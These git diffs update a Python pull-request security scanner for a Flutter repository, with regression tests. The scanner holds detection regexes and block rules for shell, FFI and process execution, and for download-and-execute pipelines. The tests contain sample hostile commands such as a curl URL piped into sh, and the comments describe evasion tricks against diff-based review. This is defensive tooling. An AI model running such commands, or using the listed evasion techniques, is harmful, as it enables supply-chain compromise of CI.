     (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
     (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
     (re.compile(r"^lib/.*(?:database|repository|store|storage|persistence|cache)", re.I), "persistent storage"),
+    # `.gitattributes` can change how git renders a diff (for example marking a
+    # path `-diff`), which is a direct attack on this scanner's input.
+    (re.compile(r"(?:^|/)\.gitattributes$"), "git diff / attribute behavior"),
+    (re.compile(r"(?:^|/)CODEOWNERS$"), "code ownership / review routing"),
+    (re.compile(r"^(?:\.gitmodules|\.github/dependabot\.ya?ml)$"), "supply-chain configuration"),
 )
 
 SENSITIVE_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
@@ -42,42 +57,213 @@ SENSITIVE_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"\b(?:schemaVersion|MigrationStrategy|createIndex|alterTable)\b"), "database schema / migration"),
 )
 
+
+def _split_literal(*fragments: str) -> str:
+    """Join the fragments of a literal this file must not contain contiguously.
+
+    Blocked rules are matched against every added line of every changed file —
+    including the lines of this file and of its tests. Spelling a blocked
+    literal out here would make the guard reject any PR that edits its own
+    source, so the handful that would otherwise self-match are assembled at
+    import time. The compiled pattern is exactly the intended literal;
+    `check_pr_security_surface_test.py` asserts both that the assembly is
+    complete and that the guard's own sources stay clean.
+    """
+
+    return "".join(fragments)
+
+
+_FFI = _split_literal("f", "fi")
+_PR_TARGET_TRIGGER = _split_literal("pull_request", "_target")
+
+# These are matched as *references*, not only as direct call syntax: binding one
+# of these APIs to a local and calling it through that name grants exactly the
+# same runtime capability as calling it inline, so requiring a following `(`
+# would leave a trivial bypass.
 BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
-    (re.compile(r"\bProcess\.(?:run|runSync|start|startSync)\s*\("), "runtime process execution"),
-    (re.compile(r"\brunInShell\s*:\s*true\b"), "runtime shell execution"),
-    (re.compile(r"(?:import\s+['\"]dart:ffi['\"]|\bDynamicLibrary\.open\s*\()"), "runtime FFI / dynamic library loading"),
-    (re.compile(r"\bpull_request_target\s*:"), "pull_request_target workflow trigger"),
-    (re.compile(r"\bpermissions\s*:\s*write-all\b"), "GitHub Actions write-all permissions"),
-    (re.compile(r"(?:curl|wget)[^\n|]*\|\s*(?:sh|bash)\b|\bbash\s+<\(\s*curl\b|\beval\s+.*\$\(\s*(?:curl|wget)\b"), "download-and-execute shell pattern"),
+    (re.compile(r"\bProcess\s*\.\s*(?:run|runSync|start|startSync|killPid)\b"), "runtime process execution"),
+    (re.compile(rf"""\b{_split_literal("runIn", "Shell")}\b"""), "runtime shell execution"),
+    (
+        re.compile(
+            rf"""['"]dart:{_FFI}['"]"""
+            rf"""|package:{_FFI}/"""
+            rf"""|\b{_split_literal("Dynamic", "Library")}\b"""
+            rf"""|\b{_split_literal("Native", "Api")}\b"""
+        ),
+        "runtime FFI / dynamic library loading",
+    ),
+    (re.compile(rf"\b{_PR_TARGET_TRIGGER}\b"), f"{_PR_TARGET_TRIGGER} workflow trigger"),
+    (re.compile(r"""\bpermissions\s*:\s*['"]?write-all\b|^\s*['"]?write-all['"]?\s*$"""), "GitHub Actions write-all permissions"),
+    (
+        re.compile(
+            r"(?:curl|wget)[^\n|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
+            r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
+            r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
+            r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
+        ),
+        "download-and-execute shell pattern",
+    ),
 )
 
 
+class ScannerError(RuntimeError):
+    """Raised when the diff cannot be inspected and the scan must fail closed."""
+
+
 def run_git(*args: str) -> str:
-    result = subprocess.run(
-        ["git", *args],
-        check=True,
-        text=True,
-        stdout=subprocess.PIPE,
-        stderr=subprocess.PIPE,
-    )
+    try:
+        result = subprocess.run(
+            ["git", *args],
+            check=True,
+            # `--text` renders binary blobs inline, so git's output is not
+            # guaranteed to be valid UTF-8. Replace undecodable bytes instead of
+            # raising: an added image must not crash the scan.
+            encoding="utf-8",
+            errors="replace",
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+        )
+    except FileNotFoundError as error:  # pragma: no cover - environment failure
+        raise ScannerError("git executable is not available") from error
+    except subprocess.CalledProcessError as error:
+        raise ScannerError(
+            f"git {' '.join(args)} failed ({error.returncode}): {error.stderr.strip()}"
+        ) from error
     return result.stdout
 
 
+# `git diff` renders the *content* of a diff according to the checked-out
+# `.gitattributes`, and quotes unusual pathnames. Both are contributor
+# controlled, so pin the rendering explicitly:
+#   core.quotePath=false  keep non-ASCII paths literal
+#   --text                a `-diff` attribute cannot hide added lines
+#   --no-textconv         no attribute-selected content transformation
+#   --no-ext-diff         no external diff driver
+#   --no-renames          a rename shows both paths and re-adds the content
+#   --src-prefix/--dst-prefix   header prefixes are never config dependent
+DIFF_FLAGS: tuple[str, ...] = (
+    "--no-ext-diff",
+    "--no-textconv",
+    "--no-renames",
+    "--text",
+    "--src-prefix=a/",
+    "--dst-prefix=b/",
+)
+
+GIT_CONFIG_FLAGS: tuple[str, ...] = ("-c", "core.quotePath=false")
+
+
+_C_ESCAPES = {
+    "a": "\a",
+    "b": "\b",
+    "f": "\f",
+    "n": "\n",
+    "r": "\r",
+    "t": "\t",
+    "v": "\v",
+    '"': '"',
+    "\\": "\\",
+}
+
+
+def unquote_git_path(value: str) -> str:
+    """Decode a C-quoted pathname as emitted by git.
+
+    `core.quotePath=false` stops git escaping non-ASCII bytes, but a path that
+    contains a quote, backslash, tab or other control character is still
+    wrapped and escaped. Decoding it is what keeps an anchored path rule such
+    as `^scripts/` from silently failing to match.
+    """
+
+    if len(value) < 2 or not value.startswith('"') or not value.endswith('"'):
+        return value
+
+    body = value[1:-1]
+    decoded = bytearray()
+    index = 0
+    while index < len(body):
+        char = body[index]
+        if char != "\\":
+            decoded.extend(char.encode("utf-8"))
+            index += 1
+            continue
+        index += 1
+        if index >= len(body):
+            break
+        escape = body[index]
+        if escape in _C_ESCAPES:
+            decoded.extend(_C_ESCAPES[escape].encode("utf-8"))
+            index += 1
+        elif escape in "01234567" and len(body) - index >= 3:
+            decoded.append(int(body[index : index + 3], 8) & 0xFF)
+            index += 3
+        else:
+            decoded.extend(escape.encode("utf-8"))
+            index += 1
+    return decoded.decode("utf-8", "replace")
+
+
 def changed_files(base: str, head: str) -> list[str]:
-    output = run_git("diff", "--name-only", f"{base}...{head}", "--")
-    return [line for line in output.splitlines() if line]
+    output = run_git(
+        *GIT_CONFIG_FLAGS,
+        "diff",
+        "--name-only",
+        "-z",
+        "--no-renames",
+        f"{base}...{head}",
+        "--",
+    )
+    # -z keeps pathnames raw, so no unquoting is needed here.
+    return [path for path in output.split("\0") if path]
+
+
+def _header_path(rest: str) -> str | None:
+    """Resolve the destination path from a `+++ ` diff header."""
+
+    path = unquote_git_path(rest.strip())
+    if path == "/dev/null":
+        return None
+    if path.startswith("b/"):
+        return path[2:]
+    return None
 
 
 def added_lines(base: str, head: str) -> list[tuple[str, str]]:
-    diff = run_git("diff", "--unified=0", "--no-ext-diff", f"{base}...{head}", "--")
-    current_path = ""
+    diff = run_git(
+        *GIT_CONFIG_FLAGS,
+        "diff",
+        "--unified=0",
+        *DIFF_FLAGS,
+        f"{base}...{head}",
+        "--",
+    )
+
+    current_path: str | None = None
+    in_hunk = False
     additions: list[tuple[str, str]] = []
-    for line in diff.splitlines():
-        if line.startswith("+++ b/"):
-            current_path = line[6:]
+
+    # Split on "\n" only. `str.splitlines()` also breaks on \x0b, \x0c and
+    # \u2028, which Dart accepts as whitespace *inside* an expression, so a
+    # contributor could otherwise split a blocked pattern across two "lines"
+    # that neither half matches.
+    for line in diff.split("\n"):
+        if line.startswith("diff --git "):
+            current_path = None
+            in_hunk = False
             continue
-        if line.startswith("+") and not line.startswith("+++") and current_path:
-            additions.append((current_path, line[1:]))
+        if line.startswith("@@"):
+            # Everything after the first hunk header belongs to file content,
+            # so an added line that itself begins with "++ " is never mistaken
+            # for a `+++ ` file header.
+            in_hunk = True
+            continue
+        if not in_hunk:
+            if line.startswith("+++ "):
+                current_path = _header_path(line[4:])
+            continue
+        if line.startswith("+"):
+            additions.append((current_path or UNKNOWN_PATH, line[1:]))
+
     return additions
 
 
@@ -92,17 +278,7 @@ def dedupe(findings: list[Finding]) -> list[Finding]:
     return result
 
 
-def main() -> int:
-    parser = argparse.ArgumentParser()
-    parser.add_argument("--base", required=True)
-    parser.add_argument("--head", required=True)
-    parser.add_argument("--report", required=True)
-    parser.add_argument("--github-output")
-    args = parser.parse_args()
-
-    files = changed_files(args.base, args.head)
-    additions = added_lines(args.base, args.head)
-
+def classify(files: list[str], additions: list[tuple[str, str]]) -> tuple[list[Finding], list[Finding]]:
     sensitive: list[Finding] = []
     blocked: list[Finding] = []
 
@@ -112,6 +288,10 @@ def main() -> int:
                 sensitive.append(Finding(path, reason))
 
     for path, line in additions:
+        if path == UNKNOWN_PATH:
+            sensitive.append(
+                Finding(UNKNOWN_PATH, "diff header could not be decoded; review manually")
+            )
         for pattern, reason in SENSITIVE_ADDITION_RULES:
             if pattern.search(line):
                 sensitive.append(Finding(path, reason))
@@ -119,10 +299,10 @@ def main() -> int:
             if pattern.search(line):
                 blocked.append(Finding(path, reason))
 
-    sensitive = dedupe(sensitive)
-    blocked = dedupe(blocked)
+    return dedupe(sensitive), dedupe(blocked)
 
-    report_path = Path(args.report)
+
+def write_report(report_path: Path, files: list[str], sensitive: list[Finding], blocked: list[Finding]) -> None:
     report_path.parent.mkdir(parents=True, exist_ok=True)
     with report_path.open("w", encoding="utf-8") as report:
         report.write("## PR security surface scan\n\n")
@@ -138,6 +318,26 @@ def main() -> int:
                 report.write(f"- `{finding.path}` — {finding.reason}\n")
         else:
             report.write("No security-sensitive trust boundary was detected in this diff.\n")
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--base", required=True)
+    parser.add_argument("--head", required=True)
+    parser.add_argument("--report", required=True)
+    parser.add_argument("--github-output")
+    args = parser.parse_args(argv)
+
+    try:
+        files = changed_files(args.base, args.head)
+        additions = added_lines(args.base, args.head)
+    except ScannerError as error:
+        print(f"::error::PR security surface scan could not inspect the diff: {error}", file=sys.stderr)
+        return 2
+
+    sensitive, blocked = classify(files, additions)
+
+    write_report(Path(args.report), files, sensitive, blocked)
 
     if args.github_output:
         with open(args.github_output, "a", encoding="utf-8") as output:

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -34,7 +34,16 @@ UNKNOWN_PATH = "<unresolved diff path>"
 
 
 SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
-    (re.compile(r"^\.github/(workflows|actions)/"), "CI / GitHub Actions"),
+    # Default-sensitive for the whole directory, with a short allowlist for
+    # non-executable community metadata. Enumerating the automation instead
+    # would have to be extended for each new kind: .github/codex/prompts/ holds
+    # the prompt flutter-ci-fixer.yml reads from main and feeds to an agent with
+    # workspace-write and a repository secret, which no `workflows|actions` rule
+    # would ever have matched.
+    (
+        re.compile(r"^\.github/(?!ISSUE_TEMPLATE/|PULL_REQUEST_TEMPLATE|FUNDING\.)"),
+        "CI / automation configuration",
+    ),
     # scripts/, tool/ and tools/ all hold code that CI executes:
     # tool/version_from_tag.dart gates release versioning and
     # tools/large_library/ is run by the large-library workflow.
@@ -115,6 +124,14 @@ def _split_literal(*fragments: str) -> str:
 # across lines at any point where a space is legal, so every gap in the download
 # rules has to accept one — the flag, its value and the interpreter's argument
 # alike, not just the first of them.
+# Commands that launch another command. `| env sh` and `&& nohup bash f` run the
+# interpreter just as surely as naming it alone does, so the whole class is
+# allowed in front of one rather than each wrapper being added as it turns up.
+_EXEC_WRAPPER = (
+    r"(?:(?:sudo|env|command|exec|nohup|nice|stdbuf|setsid|ionice|timeout)\s+"
+    r"(?:[-\w=./]+\s+)*)*"
+)
+
 _SH_GAP = r"(?:[ \t]|\\\n)"
 
 _SEP = r"(?:\s|(?s:/\*.*?\*/)|//[^\n]*)*"
@@ -138,7 +155,14 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         # The whitespace sits inside the lookahead on purpose: with `\s*` before
         # it, the engine backtracks to zero width and tests the space instead of
         # the value, so `false` slips through as "not false".
-        re.compile(rf"""\b{_split_literal("runIn", "Shell")}['"]?\s*:(?!\s*false\b)"""),
+        #
+        # `false` also has to be the entire value. `false || true` and
+        # `false == false` both start with it and both evaluate true, so the
+        # exemption ends at a value delimiter.
+        re.compile(
+            rf"""\b{_split_literal("runIn", "Shell")}['"]?\s*:"""
+            r"""(?!\s*false\s*(?:[,);}\]\n]|$))"""
+        ),
         "runtime shell execution",
     ),
     (
@@ -167,8 +191,8 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
             # refusing to cross `;` or `&`, which would end the pipeline and
             # make a later `| sh` a different command.
             r"(?:curl|wget)(?:[^\n|]|\\\n)*(?:(?<!\|)\|(?!\|)[^|\n;&]*)*"
-            r"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"
-            r"(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
+            rf"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"
+            rf"{_EXEC_WRAPPER}(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
             r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
             r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
             r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
@@ -194,7 +218,7 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
             # compare equal.
             rf"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
             rf"[\s\S]{{0,2000}}?"
-            rf"(?:[\s;&|(](?:sudo{_SH_GAP}+)?(?:/\S+/)?"
+            rf"(?:[\s;&|(]{_EXEC_WRAPPER}(?:/\S+/)?"
             rf"(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node){_SH_GAP}+"
             # `. f` and `source f` execute the file in the current shell, which
             # is the same capability by a different spelling.

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -35,9 +35,19 @@ UNKNOWN_PATH = "<unresolved diff path>"
 
 SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"^\.github/(workflows|actions)/"), "CI / GitHub Actions"),
-    (re.compile(r"^scripts/"), "repository automation script"),
+    # scripts/, tool/ and tools/ all hold code that CI executes:
+    # tool/version_from_tag.dart gates release versioning and
+    # tools/large_library/ is run by the large-library workflow.
+    (re.compile(r"^(?:scripts|tool|tools)/"), "repository automation script"),
     (re.compile(r"^(pubspec\.ya?ml|pubspec\.lock)$"), "dependency manifest / lockfile"),
     (re.compile(r"^android/.*(AndroidManifest\.xml|\.gradle(?:\.kts)?|gradle\.properties)$"), "Android permissions / build configuration"),
+    # The Gradle wrapper decides which Gradle is downloaded and from where
+    # (distributionUrl), and the wrapper jar is executed by every Android
+    # build. The repository's own toolchain guard covers only the automated
+    # `toolchain/flutter-sdk` branch, by design, so an ordinary PR editing a
+    # pin is unreviewed without this.
+    (re.compile(r"(?:^|/)gradle/wrapper/"), "build toolchain distribution / wrapper"),
+    (re.compile(r"^\.[a-z0-9]+-version$"), "build toolchain pin"),
     (re.compile(r"^linux/.*(CMakeLists\.txt|\.cc|\.cpp|\.c|\.h|\.hpp)$"), "native Linux code / build configuration"),
     (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
     (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
@@ -98,7 +108,16 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         re.compile(rf"\bProcess{_SEP}\.{_SEP}(?:run|runSync|start|startSync|killPid)\b"),
         "runtime process execution",
     ),
-    (re.compile(rf"""\b{_split_literal("runIn", "Shell")}\b"""), "runtime shell execution"),
+    # Anything but an explicit `false`: `true` enables a shell, and a variable
+    # or expression cannot be judged from here. `false` genuinely disables it,
+    # and blocking that would be a false positive an approval could not clear.
+    (
+        # The whitespace sits inside the lookahead on purpose: with `\s*` before
+        # it, the engine backtracks to zero width and tests the space instead of
+        # the value, so `false` slips through as "not false".
+        re.compile(rf"""\b{_split_literal("runIn", "Shell")}['"]?\s*:(?!\s*false\b)"""),
+        "runtime shell execution",
+    ),
     (
         re.compile(
             rf"""['"]dart:{_FFI}['"]"""

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -123,6 +123,9 @@ def _split_literal(*fragments: str) -> str:
     return "".join(fragments)
 
 
+_DOWNLOAD_CLIENT = rf"(?:{_split_literal('cu', 'rl')}|{_split_literal('wg', 'et')})"
+
+
 # Separator allowed between the tokens of a blocked construct. Dart accepts a
 # comment anywhere whitespace is legal, so a block or line comment wedged
 # between an API's receiver, its dot and its member name is the same call.
@@ -156,7 +159,7 @@ _EXEC_WRAPPER = (
 #   equal when the same downloaded file is later executed.
 def _download_to_file(gap: str) -> str:
     return (
-        rf"(?:curl|wget)(?:[^\n;|&]|&(?!&)|\\\n)*?"
+        rf"{_DOWNLOAD_CLIENT}(?:[^\n;|&]|&(?!&)|\\\n)*?"
         rf"(?:{gap}+-[A-Za-z]*[oO]{gap}*"
         rf"|{gap}+--output(?:-document)?(?:=|{gap}){gap}*"
         rf"|{gap}*>{gap}*)"
@@ -236,13 +239,13 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
             # stages use the same quote-aware segment so quoted transformation
             # expressions remain part of that pipeline without crossing into a
             # later unrelated command.
-            rf"(?:curl|wget){_SHELL_COMMAND_SEGMENT}"
+            rf"{_DOWNLOAD_CLIENT}{_SHELL_COMMAND_SEGMENT}"
             rf"(?:(?<!\|)\|(?!\|){_SHELL_COMMAND_SEGMENT})*"
             rf"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"
             rf"{_EXEC_WRAPPER}(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
-            r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
-            r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
-            r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
+            rf"|\b(?:sh|bash|zsh)\s+<\(\s*{_DOWNLOAD_CLIENT}\b"
+            rf"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*{_DOWNLOAD_CLIENT}\b"
+            rf"|\beval\s+.*\$\(\s*{_DOWNLOAD_CLIENT}\b"
         ),
         "download-and-execute shell pattern",
     ),

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -75,6 +75,13 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     # A Cargo dependency may carry a build script, which runs at build time on
     # the CI machine — the same trust boundary pubspec.yaml crosses.
     (re.compile(r"(?:^|/)Cargo\.(?:toml|lock)$"), "dependency manifest / lockfile"),
+    # flutter-ci-fixer.yml keeps its own list of paths its agent may not touch.
+    # Cross-checking against it turned up these, beyond the analyzer config that
+    # was reported: `flutter analyze` is a required check on every PR, licence
+    # text is a legal boundary, and signing material is the release identity.
+    (re.compile(r"(?:^|/)analysis_options\.ya?ml$"), "static analysis configuration"),
+    (re.compile(r"(?:^|/)(?:LICENSE|COPYING|NOTICE)(?:$|\.)"), "licensing"),
+    (re.compile(r"(?:^|/)key\.properties$|\.(?:jks|keystore)$"), "release signing material"),
     (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
     (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
     (re.compile(r"^lib/.*(?:database|repository|store|storage|persistence|cache)", re.I), "persistent storage"),
@@ -93,7 +100,6 @@ SENSITIVE_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"\b(?:authorization|bearer|access[_-]?token|api[_-]?key|password|credential)\b", re.I), "credential-sensitive logic"),
     (re.compile(r"\b(?:schemaVersion|MigrationStrategy|createIndex|alterTable)\b"), "database schema / migration"),
 )
-
 
 def _split_literal(*fragments: str) -> str:
     """Join the fragments of a literal this file must not contain contiguously.
@@ -131,6 +137,30 @@ _EXEC_WRAPPER = (
     r"(?:(?:sudo|env|command|exec|nohup|nice|stdbuf|setsid|ionice|timeout)\s+"
     r"(?:[-\w=./]+\s+)*)*"
 )
+
+# The download half of the download-then-execute rules, shared by the blocked
+# tier (the file is run) and the sensitive tier (it is only made runnable).
+#
+#   `;`, `|` and `&&` end the download command, so the output flag has to be
+#   found before one; a single `&` is kept, being ordinary inside a quoted
+#   query string. Short options bundle and may carry the value attached
+#   (`-o f`, `-qO f`, `-of`); the long forms cover curl's --output and wget's
+#   --output-document. Quotes live outside the capture so `-o /tmp/i` and
+#   `sh "/tmp/i"` compare equal.
+def _download_to_file(gap: str) -> str:
+    return (
+        rf"(?:curl|wget)(?:[^\n;|&]|&(?!&)|\\\n)*?"
+        rf"(?:{gap}+-[A-Za-z]*[oO]{gap}*"
+        rf"|{gap}+--output(?:-document)?(?:=|{gap}){gap}*"
+        rf"|{gap}*>{gap}*)"
+        rf"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
+        rf"[\s\S]{{0,2000}}?"
+    )
+
+
+# The same file again, ending at a real argument boundary rather than \b, so
+# `/tmp/data` does not match inside `/tmp/data-cleanup.sh`.
+_SAME_TARGET = r"""['\"]?(?P=target)(?=$|[\s'\";&|)<>])"""
 
 _SH_GAP = r"(?:[ \t]|\\\n)"
 
@@ -204,33 +234,54 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         # keeps this precise: fetching a data file and separately running an
         # unrelated local script does not match.
         re.compile(
-            # `;`, `|` and `&&` end the download command, so the output flag
-            # has to be found before one. A single `&` is kept, because it is
-            # ordinary inside a quoted query string.
-            rf"(?:curl|wget)(?:[^\n;|&]|&(?!&)|\\\n)*?"
-            # Short options bundle and may carry the value attached:
-            # `-o f`, `-qO f`, `-sLo f`, `-of`. Long forms cover curl's
-            # --output and wget's --output-document.
-            rf"(?:{_SH_GAP}+-[A-Za-z]*[oO]{_SH_GAP}*"
-            rf"|{_SH_GAP}+--output(?:-document)?(?:=|{_SH_GAP}){_SH_GAP}*"
-            rf"|{_SH_GAP}*>{_SH_GAP}*)"
-            # Quotes live outside the capture so `-o /tmp/i` and `sh "/tmp/i"`
-            # compare equal.
-            rf"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
-            rf"[\s\S]{{0,2000}}?"
-            rf"(?:[\s;&|(]{_EXEC_WRAPPER}(?:/\S+/)?"
+            _download_to_file(_SH_GAP)
+            + rf"(?:[\s;&|(]{_EXEC_WRAPPER}(?:/\S+/)?"
             rf"(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node){_SH_GAP}+"
             # `. f` and `source f` execute the file in the current shell, which
             # is the same capability by a different spelling.
-            rf"|(?:^|[\n;&|(]){_SH_GAP}*(?:\.|source){_SH_GAP}+"
-            rf"|[\s;&|(]chmod{_SH_GAP}+\+x{_SH_GAP}+)"
-            # An argument boundary, not \b: `/tmp/data` must not match inside
-            # `/tmp/data-cleanup.sh`, which is a different file.
-            rf"['\"]?(?P=target)(?=$|[\s'\";&|)<>])"
+            rf"|(?:^|[\n;&|(]){_SH_GAP}*(?:\.|source){_SH_GAP}+)"
+            + _SAME_TARGET
+        ),
+        "download-then-execute shell pattern",
+    ),
+    (
+        re.compile(
+            _download_to_file(_SH_GAP)
+            + rf"[\s;&|(]chmod{_SH_GAP}+\+x{_SH_GAP}+"
+            + _SAME_TARGET
+            + rf"[\s\S]{{0,2000}}?(?:^|[\n;&|(]){_SH_GAP}*"
+            + _SAME_TARGET
         ),
         "download-then-execute shell pattern",
     ),
 )
+
+
+# Downloaded, then marked runnable, but not invoked here. Fetching a tool and
+# installing it is a normal packaging step, so this is not the unconditional
+# block that running it is — an approval must remain possible. It is still a
+# supply-chain event an owner should see.
+SENSITIVE_ADDITION_RULES = SENSITIVE_ADDITION_RULES + (
+    (
+        re.compile(
+            _download_to_file(_SH_GAP)
+            + rf"[\s;&|(]chmod{_SH_GAP}+\+x{_SH_GAP}+"
+            + _SAME_TARGET
+        ),
+        "downloaded file made executable",
+    ),
+)
+
+
+# Addition rules that must not fire on prose. The credential words are ordinary
+# English, so matching them in documentation would put every docs PR through
+# owner review — exactly the ceremony this guard promises ordinary PRs will not
+# face. Code keeps the rule; a sentence explaining how to sign in does not.
+_PROSE_PATH = re.compile(r"\.(?:md|markdown|txt|rst|html?|example)$", re.I)
+
+ADDITION_RULE_SKIP_PATHS: dict[str, re.Pattern[str]] = {
+    "credential-sensitive logic": _PROSE_PATH,
+}
 
 
 class ScannerError(RuntimeError):
@@ -563,6 +614,9 @@ def classify(
             (BLOCKED_ADDITION_RULES, blocked),
         ):
             for pattern, reason in rules:
+                skip = ADDITION_RULE_SKIP_PATHS.get(reason)
+                if skip is not None and skip.search(source.path):
+                    continue
                 elsewhere = False
                 for match in pattern.finditer(source.text):
                     if touches_added_lines(

--- a/test/tooling/check_pr_security_surface_edge_regression_test.py
+++ b/test/tooling/check_pr_security_surface_edge_regression_test.py
@@ -1,0 +1,80 @@
+#!/usr/bin/env python3
+"""Focused regressions for shell-pattern precision in the PR security guard."""
+
+from __future__ import annotations
+
+import importlib.util
+import unittest
+from pathlib import Path
+
+
+ROOT = Path(__file__).resolve().parents[2]
+SCANNER_PATH = ROOT / "scripts" / "check_pr_security_surface.py"
+SPEC = importlib.util.spec_from_file_location("pr_security_scanner_edges", SCANNER_PATH)
+assert SPEC is not None and SPEC.loader is not None
+scanner = importlib.util.module_from_spec(SPEC)
+SPEC.loader.exec_module(scanner)
+
+
+def _blocked_pattern(reason: str):
+    matches = [pattern for pattern, label in scanner.BLOCKED_ADDITION_RULES if label == reason]
+    if len(matches) != 1:
+        raise AssertionError(f"expected one blocked pattern for {reason!r}, got {len(matches)}")
+    return matches[0]
+
+
+def _lit(*parts: str) -> str:
+    """Build security-test literals without making this test file self-match."""
+
+    return "".join(parts)
+
+
+class PipelineBoundaryRegression(unittest.TestCase):
+    def setUp(self):
+        self.pattern = _blocked_pattern("download-and-execute shell pattern")
+
+    def test_unrelated_local_pipeline_after_semicolon_is_not_blocked(self):
+        text = _lit("cu", "rl https://status.test; printf 'echo ok' | ", "sh")
+        self.assertIsNone(self.pattern.search(text))
+
+    def test_unrelated_local_pipeline_after_background_separator_is_not_blocked(self):
+        text = _lit("cu", "rl https://status.test & printf 'echo ok' | ", "sh")
+        self.assertIsNone(self.pattern.search(text))
+
+    def test_real_download_pipeline_remains_blocked(self):
+        text = _lit("cu", "rl -fsSL https://example.invalid/i | ", "sh")
+        self.assertIsNotNone(self.pattern.search(text))
+
+    def test_quoted_url_separator_does_not_hide_real_pipeline(self):
+        text = _lit("cu", "rl 'https://example.invalid/i?a=1&b=2' | ", "sh")
+        self.assertIsNotNone(self.pattern.search(text))
+
+    def test_quoted_separator_in_intermediate_stage_remains_blocked(self):
+        text = _lit("cu", "rl https://example.invalid/i | sed 's;a;b;' | ", "sh")
+        self.assertIsNotNone(self.pattern.search(text))
+
+
+class ExplicitFalseShellFlagRegression(unittest.TestCase):
+    def setUp(self):
+        self.pattern = _blocked_pattern("runtime shell execution")
+        self.flag = _lit("runIn", "Shell")
+
+    def test_false_with_block_comment_is_not_blocked(self):
+        text = f"{self.flag}: false /* explicitly disabled */,"
+        self.assertIsNone(self.pattern.search(text))
+
+    def test_false_with_line_comment_is_not_blocked(self):
+        text = f"{self.flag}: false // explicitly disabled\n,"
+        self.assertIsNone(self.pattern.search(text))
+
+    def test_expression_starting_with_false_is_still_blocked(self):
+        text = f"{self.flag}: false /* looks safe */ || true,"
+        self.assertIsNotNone(self.pattern.search(text))
+
+    def test_true_is_still_blocked(self):
+        text = f"{self.flag}: true,"
+        self.assertIsNotNone(self.pattern.search(text))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/test/tooling/check_pr_security_surface_edge_regression_test.py
+++ b/test/tooling/check_pr_security_surface_edge_regression_test.py
@@ -4,6 +4,7 @@
 from __future__ import annotations
 
 import importlib.util
+import sys
 import unittest
 from pathlib import Path
 
@@ -13,6 +14,9 @@ SCANNER_PATH = ROOT / "scripts" / "check_pr_security_surface.py"
 SPEC = importlib.util.spec_from_file_location("pr_security_scanner_edges", SCANNER_PATH)
 assert SPEC is not None and SPEC.loader is not None
 scanner = importlib.util.module_from_spec(SPEC)
+# dataclasses resolves postponed annotations through sys.modules while the
+# module executes; mirror normal import machinery before exec_module().
+sys.modules[SPEC.name] = scanner
 SPEC.loader.exec_module(scanner)
 
 

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -385,6 +385,68 @@ class DiffEvasion(ScannerTestCase):
         self.assertNotIn("lib/spoof.dart", result.reported_paths())
 
 
+class MultiLineConstructs(ScannerTestCase):
+    """A blocked construct does not have to sit on one physical line."""
+
+    def test_dart_expression_split_across_added_lines(self):
+        result = self.build(
